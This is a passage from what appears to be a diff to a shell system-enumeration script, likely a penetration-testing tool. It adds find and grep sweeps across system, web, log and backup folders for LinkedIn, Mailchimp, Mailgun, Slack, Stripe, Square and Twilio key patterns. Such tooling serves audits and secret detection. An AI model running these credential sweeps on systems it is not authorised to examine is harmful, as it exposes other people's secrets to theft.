'/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +wait +print_3title "Searching Mailchamp API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +wait +print_3title "Searching Mailgun API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +wait +print_3title "Searching Picatic API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +wait +print_3title "Searching Slack Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +wait +print_3title "Searching Slack Webhook (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~https://hooks.slack.com/services/T[a-zA-Z0-9_]{10}/B[a-zA-Z0-9_]{10}/[a-zA-Z0-9_]{24}~${SED_RED}~" & +wait +print_3title "Searching Stripe API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +wait +print_3title "Searching Square Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +wait +print_3title "Searching Square Oauth Secret (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +wait +print_3title "Searching Twilio API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | 